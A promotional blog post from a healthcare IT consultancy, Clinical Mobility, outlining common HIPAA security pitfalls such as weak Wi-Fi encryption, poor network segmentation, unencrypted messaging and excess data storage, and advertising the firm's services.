The past decade has seen an increase in concern about patient privacy.
In spite of HIPAA (Health Insurance Portability and Accountability Act) being around since 1996, to this day, many insurers still fail to safely handle their patients’ health records and other sensitive data.
As confidential patient information is often shared through a wide range of channels - from health records to billing and clinical research - healthcare providers need to become wiser to the risk of confidential data falling into the hands of bad actors.
Failure to adhere to strict security standards can seriously harm a business's reputation as well as potentially lead to serious financial penalties.
Common HIPAA Pitfalls
The US Department of Health and Human Services for Civil Rights (OCR) takes HIPAA violations very seriously. When a security breach takes place, the standard procedure is to investigate the origin of the issue and assess whether the healthcare provider/insurer did their best to protect sensitive information.
Because compliance is a difficult matter, though, it is not uncommon for industry professionals to make mistakes. Below, we have gathered 6 common pitfalls for your consideration.
Failing to Secure Sensitive Data Access
At the risk of stating the obvious, failure to properly encrypt sensitive patient info can lead to all kinds of disastrous consequences.
Encryption at Rest
We’ve all been subjected to encrypting data on our PCs & smartphones. System administrators encrypt servers and network volumes. However, there are a few areas often missed:
• Data stored on medical devices
• Application-generated data encryption or obfuscation
When we’ve inspected medical devices, we have observed cases that store network security credentials (usernames and passwords) in clear text or via incredibly weak encryption methods.
While application data is commonly unencrypted, ensuring that certain PII (Patient Identifiable Information)—such as MRNs and patient names—be decoupled from the stored data.
Encryption When in Transport
Data is often not inherently encrypted by applications when transmitting over a network. When this is the case, network encryption methods must be employed. The wireless network link should use a strong WPA2 Enterprise grade method (WPA3 is now available, but WPA2 Enterprise methods meet minimum levels for now). This requires each several things:
• Not using “Personal” grade security. (a.k.a. PSK or Passphrase)
• Network segmentation
• Proper implementation
Personal grade security is for home networks. We must quit using them in healthcare networks because they leave massive security and operational maintenance issues. Many (arguably most) personal grade passphrases can be obtained by observing common Wi-Fi traffic using downloadable open-source tools. What’s more is that these passphrases never change, so once the PSK is obtained, decryption is possible of all traffic.
Network segmentation is relatively synonymous with a firewall. This creates network sub-ecosystems that can operate in their own bubbles with massive risk reduction from outside access. Sensitive PHI data should operate in these mini bubbles that are specific to their requirements…and no more. One huge “clinical” bubble is not sufficient. For example, a medical device should only be able to access it’s centralized server and perhaps a middleware engine. When networks are implemented correctly, when devices authenticate to the network, their identity should place them into a “network segment” that only permits access to intended resources—nothing more.
Proper implementation sounds obvious, but we find most organizations have huge implementation flaws. These flaws can result in a user obtaining usernames and passwords. Once obtained, these credentials thwart all encryption methods because they now have the keys for authorized access to data.
Here’s how we help.
Authentication and encryption is often tightly intertwined in the domain of network security. Authentication should leverage multiple factors (secondary biometrics, temporary codes or hardware credentials). This is prevents a hacker from access data with only user credentials.
Good authentication leads authorization. Authorization is the method of restricting what data and resources can be accessed. Without a thoughtful authentication strategy, you will never achieve a proper authorization or network segmentation implementation.
We have performed entire health system authentication system overhauls that has then allowed granular segmentation down to the individual network device level. Ask us to share our insights.
Overlooking SMS and Email Encryption
All too often, Protected Health Information (PHI) is shared between the healthcare facility staff on their privately owned devices. This is usually due to a lack of a proper solution available to staff. Overlooking message encryption can not only give away sensitive data but can also result in hefty OCR fines.
Fostering a cybersecurity culture within a healthcare organization and conducting periodic cybersecurity assessments is the best way to make sure the business is HIPAA-compliant.
It is unlikely you’ll ever solve this problem until you provide providers a proper solution. Simple secure texting solutions used to be the rage until organizations realized that they were not integrated into a clinical communication strategy. We strongly recommend a proper clinical communications solution. We are the healthcare industry’s #1 expert in clinical communications solution implementations.
Unnecessarily Storing of Protected Health Information
As the risk of physical devices falling in the wrong hands is real, organizations should minimize information for longer than strictly needed.
To prevent this, clinical facilities should rely on HIPAA-approved messaging apps following multi-factor identification and allowing for remote wiping of all sensitive data.
The Bottom Line
Adhering to strict HIPAA standards can sometimes be a struggle for country-wide healthcare providers. Not taking these guidelines seriously can have serious consequences for clinical facilities. Ensuring your organization’s is up to speed with the latest cybersecurity tools is key to your continued success.
With the proliferation of clinician mobility solutions, healthcare delivery organizations now collect and manage significantly more patient data than ever before. With it, IT teams are now facing many more potential threats from thousands of sources. A breach can be extremely costly, but more importantly, it could introduce risk to patient care. Clinical Mobility is in business to minimize these risks. Contact us now to discuss how we can improve your security—without being sold boxes and licenses—we will optimize what you already own.
Clinical Mobility will ensure that your healthcare delivery organization will have the highest levels of security without compromising excellent network performance.